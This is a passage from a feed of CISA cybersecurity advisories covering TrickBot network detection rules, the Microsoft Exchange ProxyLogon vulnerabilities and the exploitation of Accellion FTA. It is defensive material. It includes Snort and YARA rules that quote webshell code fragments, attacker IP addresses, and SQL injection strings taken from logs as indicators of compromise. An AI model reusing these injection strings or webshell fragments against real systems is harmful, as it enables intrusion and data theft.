classtype:bad-unknown; metadata:service http;)   alert tcp any $HTTP_PORTS -> any any (msg:"TRICKBOT:HTTP Server Header contains 'Server|3a 20|Cowboy'"; sid:1; rev:1; flow:established,from_server; content:"200"; http_stat_code; content:"Server|3a 20|Cowboy|0d 0a|"; http_header; fast_pattern; content:"content-length|3a 20|3|0d 0a|"; http_header; file_data; content:"/1/"; depth:3; isdataat:!1,relative; classtype:bad-unknown; metadata:service http;)   alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP URI POST contains C2 Exfil"; sid:1; rev:1; flow:established,to_server; content:"Content-Type|3a 20|multipart/form-data|3b 20|boundary=------Boundary"; http_header; fast_pattern; content:"User-Agent|3a 20|"; http_header; distance:0; content:"Content-Length|3a 20|"; http_header; distance:0; content:"POST"; http_method; pcre:"/^\/[a-z]{3}\d{3}\/.+?\.[A-F0-9]{32}\/\d{1,3}\//U"; pcre:"/^Host\x3a\x20(?:\d{1,3}\.){3}\d{1,3}$/mH"; content:!"Referer|3a|"; http_header; classtype:bad-unknown; metadata:service http;)   alert tcp any any -> any $HTTP_PORTS (msg:"HTTP URI GET/POST contains '/56evcxv' (Trickbot)"; sid:1; rev:1; flow:established,to_server; content:"/56evcxv"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)   alert icmp any any -> any any (msg:"TRICKBOT_ICMP_ANCHOR:ICMP traffic conatins 'hanc'"; sid:1; rev:1; itype:8; content:"hanc"; offset:4; fast_pattern; classtype:bad-unknown;)   alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains POST with 'host|3a 20|*.onion.link' and 'data=' (Trickbot/Princess Ransomeware)"; sid:1; rev:1; flow:established,to_server; content:"POST"; nocase; http_method; content:"host|3a 20|"; http_header; content:".onion.link"; nocase; http_header; distance:0; within:47; fast_pattern; file_data; content:"data="; distance:0; within:5; classtype:bad-unknown; metadata:service http;)   alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains 'host|3a 20|tpsci.com' (trickbot)"; sid:1; rev:1; flow:established,to_server; content:"host|3a 20|tpsci.com"; http_header; fast_pattern:only; classtype:bad-unknown; metadata:service http;) MitigationsCISA and FBI recommend that network defenders—in federal, state, local, tribal, territorial governments, and the private sector—consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid negative impacts. Provide social engineering and phishing training to employees. Consider drafting or updating a policy addressing suspicious emails  that specifies users must report all suspicious emails to the security and/or IT departments. Mark external emails with a banner denoting the email is from an external source to assist users in detecting spoofed emails. Implement Group Policy Object and firewall rules. Implement an antivirus program and a formalized patch management process. Implement filters at the email gateway and block suspicious IP addresses at the firewall. Adhere to the principle of least privilege. Implement a Domain-Based Message Authentication, Reporting & Conformance validation system. Segment and segregate networks and functions. Limit unnecessary lateral communications between network hoses, segments and devices. Consider using application allowlisting technology on all assets to ensure that only authorized software executes, and all unauthorized software is blocked from executing on assets. Ensure that such technology only allows authorized, digitally signed scripts to run on a system. Enforce multi-factor authentication. Enable a firewall on agency workstations configured to deny unsolicited connection requests. Disable unnecessary services on agency workstations and servers. Implement an Intrusion Detection System, if not already used, to detect C2 activity and other potentially malicious network activity Monitor web traffic. Restrict user access to suspicious or risky sites. Maintain situational awareness of the latest threats and implement appropriate access control lists. Disable the use of SMBv1 across the network and require at least SMBv2 to harden systems against network propagation modules used by TrickBot. Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies. See CISA’s Alert on Technical Approaches to Uncovering and Remediating Malicious Activity for more information on addressing potential incidents and applying best practice incident response procedures. For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops. Resources CISA Fact Sheet: TrickBot Malware MS-ISAC White Paper: Security Primer – TrickBot United Kingdom National Cyber Security Centre Advisory: Ryuk Ransomware Targeting Organisations Globally CISA and MS-ISAC Joint Alert AA20-280A: Emotet Malware MITRE ATT&CK for Enterprise References [1] FireEye Blog - A Nasty Trick: From Credential Theft Malware to Business Disruption [2] Eclypsium Blog - TrickBot Now Offers 'TrickBoot': Persist, Brick, Profit Revisions March 17, 2021: Initial Version March 24, 2021: Added MITRE ATT&CK Technique T1592.003 used for reconnaissance This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities
    by CISA on 3 Marzo 2021 at 6:12 pm

    Original release date: March 3, 2021 | Last revised: April 14, 2021SummaryNote: This Alert was updated April 13, 2021, to provide further guidance.  Cybersecurity and Infrastructure Security Agency (CISA) partners have observed active exploitation of vulnerabilities in Microsoft Exchange Server products. Successful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system. Successful exploitation may additionally enable the attacker to compromise trust and identity in a vulnerable network. Microsoft released out-of-band patches to address vulnerabilities in Microsoft Exchange Server. The vulnerabilities impact on-premises Microsoft Exchange Servers and are not known to impact Exchange Online or Microsoft 365 (formerly O365) cloud email services. This Alert includes both tactics, techniques and procedures (TTPs) and the indicators of compromise (IOCs) associated with this malicious activity. To secure against this threat, CISA recommends organizations examine their systems for the TTPs and use the IOCs to detect any malicious activity. If an organization discovers exploitation activity, they should assume network identity compromise and follow incident response procedures. If an organization finds no activity, they should apply available patches immediately and implement the mitigations in this Alert. Click here for IOCs in STIX format. Technical Details(Updated April 14, 2021): Microsoft's April 2021 Security Update newly discloses and mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019. Microsoft has released out-of-band security updates to address four vulnerabilities in Exchange Server: CVE-2021-26855 allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information. CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution.   CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server. CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server. To locate a possible compromise of these CVEs, CISA encourages organizations read the Microsoft Advisory. It is possible for an attacker, once authenticated to the Exchange server, to gain access to the Active Directory environment and download the Active Directory Database. (Updated March 12, 2021): Microsoft Security Intelligence has released a tweet on DearCry ransomware being used to exploit compromised on-premises Exchange Servers. Ransomware infections can have negative consequences to an affected organization, including: temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses incurred to restore systems and files, and potential harm to an organization’s reputation. (Updated April 12, 2021): CISA recommends organizations review Malware Analysis Report (MAR) MAR-10330097-1.v1 – DearCry Ransomware for detailed analysis, along with TTPs and IOCs. (Updated March 12, 2021): CISA encourages organizations to review CISA’s Ransomware web page for guidance and resources. Victims of ransomware should report it immediately to CISA at www.us-cert.gov/report, a local FBI Field Office, or Secret Service Field Office. Tactics, Techniques and Procedures (Updated March 10, 2021): Microsoft has released a script that scans Exchange log files for IOCs. CISA strongly encourages organizations to run the Test-ProxyLogon.ps1 script—as soon as possible—to help determine whether their systems are compromised. (Updated March 16, 2021): Note: Microsoft has released the Exchange On-premises Mitigation Tool (EOMT.ps1) that can automate portions of both the detection and patching process. Microsoft stated the following along with the release: "[the tool is intended] to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.” Review the EOMT.ps1 blog post for directions on using the tool. (Updated March 10, 2021): CISA recommends investigating for signs of a compromise from at least January 1, 2021 through present. (Updated April 12, 2021): CISA has identified 10 webshells associated with this activity. This is not an all-inclusive list of webshells that are being leveraged by actors. CISA recommends organizations review the following MARs for detailed analysis of the 10 webshells, along with TTPs and IOCs. These MARs include CISA-developed YARA rules to help network defenders detect associated malware. AR21-072A: MAR-10328877.r1.v1: China Chopper Webshell AR21-072B: MAR-10328923.r1.v1: China Chopper Webshell AR21-072C: MAR-10329107.r1.v1: China Chopper Webshell AR21-072D: MAR-10329297.r1.v1: China Chopper Webshell AR21-072E: MAR-10329298.r1.v1: China Chopper Webshell AR21-072F: MAR-10329301.r1.v1: China Chopper Webshell AR21-072G: MAR-10329494.r1.v1: China Chopper Webshell AR21-084A: MAR-10329496-1.v1: China Chopper Webshell AR21-084B: MAR-10329499-1.v1: China Chopper Webshell AR21-102A: MAR-10331466-1.v1: China Chopper Webshell (Updated March 13, 2021): A webshell is a script that can be uploaded to a compromised Microsoft Exchange Server to enable remote administration of the machine. Webshells are utilized for the following purposes: To harvest and exfiltrate sensitive data and credentials; To upload additional malware for the potential of creating, for example, a watering hole for infection and scanning of further victims; To use as a relay point to issue commands to hosts inside the network without direct internet access; To use as command-and-control infrastructure, potentially in the form of a bot in a botnet or in support of compromises to additional external networks. This could occur if the adversary intends to maintain long-term persistence. (Updated March 13, 2021): For more information, see TA15-314A Compromised Web Servers and Web Shells - Threat Awareness and Guidance. The majority of the TTPs in this section are sourced from a blog post from Volexity, a third-party cybersecurity firm. Note: the United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government. Volexity has observed the following files as targets of HTTP POST requests: /owa/auth/Current/themes/resources/logon.css /owa/auth/Current/themes/resources/owafont_ja.css /owa/auth/Current/themes/resources/lgnbotl.gif /owa/auth/Current/themes/resources/owafont_ko.css /owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot /owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf /owa/auth/Current/themes/resources/lgnbotl.gif Administrators should search the ECP server logs for the following string (or something similar): S:CMD=Set-OabVirtualDirectory.ExternalUrl=' The logs can be found at <exchange install path>\Logging\ECP\Server\. To determine possible webshell activity, administrators should search for aspx files in the following paths: \inetpub\wwwroot\aspnet_client\ (any .aspx file under this folder or sub folders) \<exchange install path>\FrontEnd\HttpProxy\ecp\auth\ (any file besides TimeoutLogoff.aspx) \<exchange install path>\FrontEnd\HttpProxy\owa\auth\ (any file or modified file that is not part of a standard install) \<exchange install path>\FrontEnd\HttpProxy\owa\auth\Current\ (any aspx file in this folder or subfolders) \<exchange install path>\FrontEnd\HttpProxy\owa\auth\<folder with version number>\ (any aspx file in this folder or subfolders) Administrators should search in the /owa/auth/Current directory for the following non-standard web log user-agents. These agents may be useful for incident responders to look at to determine if further investigation is necessary. These should not be taken as definitive IOCs: DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html) facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php) Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html) Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm) Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails) Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp) Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots) Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 Volexity observed these user-agents in conjunction with exploitation to /ecp/ URLs: ExchangeServicesClient/0.0.0.0 python-requests/2.19.1 python-requests/2.25.1 These user-agents were also observed having connections to post-exploitation web-shell access: antSword/v2.1 Googlebot/2.1+(+http://www.googlebot.com/bot.html) Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html) As with the non-standard user-agents, responders can examine internet information services (IIS) logs from Exchange Servers to identify possible historical activity. Also, as with the non-standard user agents, these should not be taken as definitive IOCs: POST /owa/auth/Current/ POST /ecp/default.flt POST /ecp/main.css POST /ecp/<single char>.js Volexity has seen attackers leverage the following IP addresses. Although these are tied to virtual private servers (VPSs) servers and virtual private networks (VPNs), responders should investigate these IP addresses on their networks and act accordingly: 103.77.192[.]219 104.140.114[.]110 104.250.191[.]110 108.61.246[.]56 149.28.14[.]163 157.230.221[.]198 167.99.168[.]251 185.250.151[.]72 192.81.208[.]169 203.160.69[.]66 211.56.98[.]146 5.254.43[.]18 5.2.69[.]14 80.92.205[.]81 91.192.103[.]43 Volexity has also provided the following YARA signatures that can be run within your network to assist in finding signs of a compromise. rule webshell_aspx_simpleseesharp : Webshell Unclassified {     meta:         author = "threatintel@volexity.com"         date = "2021-03-01"         description = "A simple ASPX Webshell that allows an attacker to write further files to disk."         hash = "893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2"       strings:         $header = "<%@ Page Language=\"C#\" %>"         $body = "<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine"       condition:         $header at 0 and         $body and         filesize < 1KB }   rule webshell_aspx_reGeorgTunnel : Webshell Commodity {     meta:         author = "threatintel@volexity.com"         date = "2021-03-01"         description = "A variation on the reGeorg tunnel webshell"         hash = "406b680edc9a1bb0e2c7c451c56904857848b5f15570401450b73b232ff38928"         reference = "https://github.com/sensepost/reGeorg/blob/master/tunnel.aspx"       strings:         $s1 = "System.Net.Sockets"         $s2 = "System.Text.Encoding.Default.GetString(Convert.FromBase64String(StrTr(Request.Headers.Get"         // a bit more experimental         $t1 = ".Split(‘|’)"         $t2 = "Request.Headers.Get"         $t3 = ".Substring("         $t4 = "new Socket("         $t5 = "IPAddress ip;"       condition:         all of ($s*) or         all of ($t*) }   rule webshell_aspx_sportsball : Webshell Unclassified {     meta:         author = "threatintel@volexity.com"         date = "2021-03-01"         description = "The SPORTSBALL webshell allows attackers to upload files or execute commands on the system."         hash = "2fa06333188795110bba14a482020699a96f76fb1ceb80cbfa2df9d3008b5b0a"       strings:         $uniq1 = "HttpCookie newcook = new HttpCookie(\"fqrspt\", HttpContext.Current.Request.Form"         $uniq2 = "ZN2aDAB4rXsszEvCLrzgcvQ4oi5J1TuiRULlQbYwldE="           $var1 = "Result.InnerText = string.Empty;"         $var2 = "newcook.Expires = DateTime.Now.AddDays("         $var3 = "System.Diagnostics.Process process = new System.Diagnostics.Process();"         $var4 = "process.StandardInput.WriteLine(HttpContext.Current.Request.Form[\""         $var5 = "else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form[\""         $var6 = "<input type=\"submit\" value=\"Upload\" />"       condition:         any of ($uniq*) or         all of ($var*) } A list of webshell hashes have also been provided by Microsoft: b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944 Note: this is not an all-inclusive list of indicators of compromise and threat actors have been known to use short-term leased IP addresses that change very frequently. Organizations that do not locate any of the IOCs in this Alert within your network traffic, may nevertheless have been compromised. CISA recommends following the guidance located in the Microsoft Advisory to check your servers for any signs of a compromise.   Conduct Forensic Analysis Should your organization see evidence of compromise, your incident response should begin with conducting forensic analysis to collect artifacts and perform triage. Please see the following list of recommendations on how to conduct forensic analysis using various tools. Although the following free tools are not endorsed by the Federal Government, incident responders commonly use them to perform forensics. While collecting artifacts to perform triage, use processes and tools that minimize the alteration of the data being collected and that minimize impact to the operating system itself. Ideally, during data collection, store the data on removable/external media and, when possible, run the artifact collection tools from the same media. Key artifacts for triage that should be collected: Memory All registry hives All windows event logs All web logs Memory can be collected with a variety of open source tools (e.g., FTK Imager by AccessData, Ram Capture by Belkasoft). Registry and Windows Event logs can be collected with a variety of open source tools as well (e.g., FTK_Imager, Kroll Artifact Parser And Extractor [KAPE]). Web logs can also be collected with a variety of open source tools (e.g., FTK Imager). Windows Artifact Collection Guide Execute the following steps in order. 1) Download the latest FTK Imager from https://accessdata.com/product-download/. Note: Ensure your review of and compliance with the applicable license associated with the product referenced, which can be found in the product’s User Guide. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government. 2) Collect memory from live system using FTK Imager. See Memory Capture with FTK Imager.pdf for instructions. Note: Download and copy “FTK Imager” folder to an external drive. Run FTK Imager.exe from the FTK Imager folder from external drive. Wait until memory collect is complete before proceeding to step 2. 3) Collect important system artifacts using KAPE. See KAPE Collection Procedure. Note: Download KAPE from a separate system; do not download KAPE to the target system. Run KAPE from external drive. 4) Collect disk image using FTK Imager. See Live Image with FTK Imager.pdf for instructions. Note: Run FTK Imager.exe from the “FTK Imager” folder from external drive. Memory Capture with FTK Imager 1) Open FTK Imager. Log into the system with Administrator privileges and launch “FTK Imager.” Note: Ensure your review of and compliance with the applicable license associated with the product referenced. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government. 2) Open “Capture Memory." Select “Capture Memory…” from the File menu. Figure 1: FTK Imager – Capture Memory Command 3) Select Path and Filenames. On the window that appears, use the “Browse” button to identify the destination of the memory capture. Save the memory capture to an external device and not the main hard drive of the system. Doing so will prevent the saved file from overwriting any dataspace on the system. Name the destination file with a descriptive name (i.e., hostname of the system). Select the box “Include pagefile” and provide a name of the pagefile that is descriptive of the system. Do not select “Create AD1 file.” Figure 2: FTK Imager – Memory Capture 4) Capture Memory. Click on “Capture Memory” to begin the capture process. The process will take several minutes depending on the size of the pagefile and the amount of memory on the system. Figure 3: FTK Imager – Capture Process KAPE Collection Procedure [1] 1) Download KAPE from https://www.kroll.com/en/services/cyber-risk/investigate-and-respond/kroll-artifact-parser-extractor-kape. 2) Disable any antivirus or host protection mechanisms that prevent execution from removable media, or data loss prevention (DLP) mechanisms that restrict utilization of removable media. Enable antivirus and host protection once this process is completed. 3) Unzip Kape.zip and run gkape.exe as admin from your removable media 4) Target source should be the drive on which the OS resides, typically C:. 5) Target destination should be an external drive folder, not the same drive as the Target source. If available, use an external hard drive or flash drive. A KAPE execution with these parameters will typically produce output artifacts with a total size of 1-25 GB. If you are going to be running KAPE on different machines and want to save to the same drive, ensure the Target destination folder is unique for each execution of KAPE. 6) Uncheck Flush checkbox (it is checked natively). 7) Check Add %d and Add %m checkboxes. 8) Select ALL checkboxes to ensure KAPE will target all available data that it is capable of targeting. This takes some time; use the down arrow and space bar to move through the list quickly. 9) Check Process VSCs checkbox. 10) Select Zip radio button and add Base name TargetOutput. 11) Ensure Deduplicate checkbox is checked (it is checked natively). At the bottom you should now see a large Current command line, similar to: .\kape.exe --tsource C: --tdest E:\%d%m --tflush --target !BasicCollection,!SANS_Triage,Avast,AviraAVLogs,Bitdefender,ComboFix,ESET,FSecure,HitmanPro,Malwarebytes, McAfee,McAfee_ePO,RogueKiller,SentinelOne,Sophos,SUPERAntiSpyware,Symantec_AV_Logs,TrendMicro,VIPRE, Webroot,WindowsDefender,Ammyy,AsperaConnect,BoxDrive,CiscoJabber,CloudStorage,ConfluenceLogs,Discord, Dropbox, Exchange,ExchangeClientAccess,ExchangeTransport,FileZilla,GoogleDrive,iTunesBackup,JavaWebCache,Kaseya,LogMeIn,Notepad++, OneDrive,OutlookPSTOST,ScreenConnect,Skype,TeamViewerLogs,TeraCopy,VNCLogs, Chrome,ChromeExtensions,Edge,Firefox,InternetExplorer,WebBrowsers,ApacheAccessLog,IISLogFiles,ManageEngineLogs, MSSQLErrorLog,NGINXLogs,PowerShellConsole,KapeTriage,MiniTimelineCollection,RemoteAdmin, VirtualDisks, Gigatribe,TorrentClients,Torrents,$Boot,$J,$LogFile,$MFT,$SDS,$T,Amcache,ApplicationEvents,BCD,CombinedLogs, EncapsulationLogging,EventLogs,EventLogs-RDP,EventTraceLogs, EvidenceOfExecution,FileSystem,GroupPolicy,LinuxOnWindowsProfileFiles,LnkFilesAndJumpLists,LogFiles,MemoryFiles, MOF,OfficeAutosave,OfficeDocumentCache,Prefetch,RDPCache,RDPLogs,RecentFileCache,Recycle, RecycleBin, RecycleBinContent,RecycleBinMetadata,RegistryHives,RegistryHivesSystem,RegistryHivesUser,ScheduledTasks,SDB, SignatureCatalog,SRUM,StartupInfo,Syscache,ThumbCache,USBDevicesLogs,WBEM,WER,WindowsFirewall,  WindowsIndexSearch,WindowsNotifcationsDB,WindowsTimeline,XPRestorePoints --vss --zip TargetOutput –gui In the bottom right corner hit the Execute! Button. Screenshot below shows gkape.exe during execution, you will also see a command window execute. Note: KAPE usually takes less than 20 minutes to complete on a workstation; if it is taking significantly longer there may be an issue. Figure 4: gkape.exe screenshot MitigationsCISA strongly recommends organizations read Microsoft’s advisory and security blog post for more information on how to look for this malicious activity and to apply critical patches as soon as possible. (Updated March 4, 2021): CISA is aware of threat actors using open source tools to search for vulnerable Microsoft Exchange Servers. This particular type of attack is scriptable, allowing attackers to easily exploit vulnerabilities through automated mechanisms. CISA advises all entities to patch as soon as possible to avoid being compromised.   (Updated March 4, 2021): From Microsoft's patch release, the security updates are available for the following operating systems: Exchange Server 2010 (update requires SP 3 or any SP 3 RU – this is a Defense in Depth update) Exchange Server 2013 (update requires CU 23) Exchange Server 2016 (update requires CU 19 or CU 18) Exchange Server 2019 (update requires CU 8 or CU 7) (Updated March 4, 2021): If you are running an older CU then what the patch will accept, you must upgrade to at least the required CU as stated above then apply the patch.  (Updated March 4, 2021): All patches must be applied using administrator privileges.   (Updated March 5, 2021): If patching is not an immediate option, CISA strongly recommends following alternative mitigations found in Microsoft’s blog on Exchange Server Vulnerabilities Mitigations. However, these options should only be used as a temporary solution, not a replacement for patching. Additionally, there are other mitigation options available. CISA recommends limiting or blocking external access to internet-facing Exchange Servers via the following: Restrict untrusted connections to port 443, or set up a VPN to separate the Exchange Server from external access; note that this will not prevent an adversary from exploiting the vulnerability if the attacker is already in your network. Block external access to on-premises Exchange: Restrict external access to OWA URL: /owa/.  Restrict external access to Exchange Admin Center (EAC) aka Exchange Control Panel (ECP) URL: /ecp/. (Updated March 4, 2021): Disconnect vulnerable Exchange servers from the internet until a patch can be applied. CISA would like to thank Microsoft and Volexity for their contributions to this Alert. Resources (Updated April 14, 2021) Microsoft's April 2021 Security Update that mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019. (Updated March 12, 2021) Check my OWA tool for checking if a system has been affected. Disclaimer: this tool does not check against an exhaustive list of compromised domains. It is meant for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information and cannot assure its accuracy or completeness; therefore, entities should not rely solely on this information to justify foregoing CISA’s recommendations for action described on this webpage. Microsoft Advisory: https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/ Microsoft Security Blog - Hafnium targeting Exchange Servers: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ Volexity Blog: https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ Microsoft’s blog on Exchange Server Vulnerabilities Mitigations: https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/ References Eric Zimmerman: KAPE Documentation Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities Supplemental Direction V1 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities Supplemental Direction V2 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities Revisions March 3, 2021: Initial Version March 4, 2020: Updated Mitigations and Technical Details sections March 5, 2021: Updated Mitigations Guidance from Microsoft March 10, 2021: Updated TTP Section March 12, 2021: Updated Resources Section March 12, 2021: Added information on DearCry Ransomware March 13, 2021: Added seven China Chopper Webshell MARs March 14, 2021: Updated information on DearCry Ransomware March 16, 2021: Added information on EOMT tool March 25, 2021: Added two China Chopper Webshell MARs March 25, 2021: Updated MARs to include YARA Rules March 31, 2021: Added links to ED 21-02 and ED 21-02 Supplemental Direction April 12, 2021: Added one China Chopper Webshell MAR and one DearCry Ransomware MAR April 13, 2021: Added links to Microsoft's April 2021 Security Update and ED 21-02 Supplemental Direction V2 April 14, 2021: Added Exchange Server 2013 to list of on-premises Exchange Servers affected by the vulnerabilities dislcosed on April 13, 2021. This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-055A: Exploitation of Accellion File Transfer Appliance
    by CISA on 24 Febbraio 2021 at 2:00 pm

    Original release date: February 24, 2021 | Last revised: February 25, 2021SummaryThis joint advisory is the result of a collaborative effort by the cybersecurity authorities of Australia,[1] New Zealand,[2] Singapore,[3] the United Kingdom,[4] and the United States.[5][6] These authorities are aware of cyber actors exploiting vulnerabilities in Accellion File Transfer Appliance (FTA).[7] This activity has impacted organizations globally, including those in Australia, New Zealand, Singapore, the United Kingdom, and the United States. Worldwide, actors have exploited the vulnerabilities to attack multiple federal and state, local, tribal, and territorial (SLTT) government organizations as well as private industry organizations including those in the medical, legal, telecommunications, finance, and energy sectors. According to Accellion, this activity involves attackers leveraging four vulnerabilities to target FTA customers.[8] In one incident, an attack on an SLTT organization potentially included the breach of confidential organizational data. In some instances observed, the attacker has subsequently extorted money from victim organizations to prevent public release of information exfiltrated from the Accellion appliance. This Joint Cybersecurity Advisory provides indicators of compromise (IOCs) and recommended mitigations for this malicious activity. For a downloadable copy of IOCs, see: AA21-055A.stix and MAR-10325064-1.v1.stix. Click here for a PDF version of this report. Technical DetailsAccellion FTA is a file transfer application that is used to share files. In mid-December 2020, Accellion was made aware of a zero-day vulnerability in Accellion FTA and released a patch on December 23, 2020. Since then, Accellion has identified cyber actors targeting FTA customers by leveraging the following additional vulnerabilities. CVE-2021-27101 – Structured Query Language (SQL) injection via a crafted HOST header (affects FTA 9_12_370 and earlier) CVE-2021-27102 – Operating system command execution via a local web service call (affects FTA versions 9_12_411 and earlier) CVE-2021-27103 – Server-side request forgery via a crafted POST request (affects FTA 9_12_411 and earlier) CVE-2021-27104 – Operating system command execution via a crafted POST request (affects FTA 9_12_370 and earlier) One of the exploited vulnerabilities (CVE-2021-27101) is an SQL injection vulnerability that allows an unauthenticated user to run remote commands on targeted devices. Actors have exploited this vulnerability to deploy a webshell on compromised systems. The webshell is located on the target system in the file /home/httpd/html/about.html or /home/seos/courier/about.html. The webshell allows the attacker to send commands to targeted devices, exfiltrate data, and clean up logs. The clean-up functionality of the webshell helps evade detection and analysis during post incident response. The Apache /var/opt/cache/rewrite.log file may also contain the following evidence of compromise: [.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html [.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html ['))union(select(loc_id)from(net1.servers)where(proximity)=(0))] (1) pass through /courier/document_root.html These entries are followed shortly by a pass-through request to sftp_account_edit.php. The entries are the SQL injection attempt indicating an attempt at exploitation of the HTTP header parameter HTTP_HOST. Apache access logging shows successful file listings and file exfiltration: “GET /courier/about.html?aid=1000 HTTP/1.1” 200 {Response size} “GET /courier/about.htmldwn={Encrypted Path}&fn={encrypted file name} HTTP/1.1” 200 {Response size} When the clean-up function is run, it modifies archived Apache access logs /var/opt/apache/c1s1-access_log.*.gz and replaces the file contents with the following string:       Binary file (standard input) matches In two incidents, the Cybersecurity and Infrastructure Security Agency (CISA) observed a large amount of data transferred over port 443 from federal agency IP addresses to 194.88.104[.]24. In one incident, the Cyber Security Agency of Singapore observed multiple TCP sessions with IP address 45.135.229[.]179. Organizations are encouraged to investigate the IOCs outlined in this advisory and in AR21-055A. If an Accellion FTA appears compromised, organizations can get an indication of the exfiltrated files by obtaining a list of file-last-accessed events for the target files of the symlinks located in the /home/seos/apps/1000/ folder over the period of malicious activity. This information is only indicative and may not be a comprehensive identifier of all exfiltrated files. MitigationsOrganizations with Accellion FTA should: Temporarily isolate or block internet access to and from systems hosting the software. Assess the system for evidence of malicious activity including the IOCs, and obtain a snapshot or forensic disk image of the system for subsequent investigation. If malicious activity is identified, obtain a snapshot or forensic disk image of the system for subsequent investigation, then: Consider conducting an audit of Accellion FTA user accounts for any unauthorized changes, and consider resetting user passwords. Reset any security tokens on the system, including the “W1” encryption token, which may have been exposed through SQL injection. Update Accellion FTA to version FTA_9_12_432 or later. Evaluate potential solutions for migration to a supported file-sharing platform after completing appropriate testing. Accellion has announced that FTA will reach end-of-life (EOL) on April 30, 2021.[9] Replacing software and firmware/hardware before it reaches EOL significantly reduces risks and costs. Additional general best practices include: Deploying automated software update tools to ensure that third-party software on all systems is running the most recent security updates provided by the software vendor. Only using up-to-date and trusted third-party components for the software developed by the organization. Adding additional security controls to prevent the access from unauthenticated sources. Resources FireEye Blog – Cyber Criminals Exploit Accellion FTA for Data Theft and Extortion  https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html  Center for Internet Security (CIS) Critical Security Controls for Effective Cyber Defense, known as "CIS Controls"  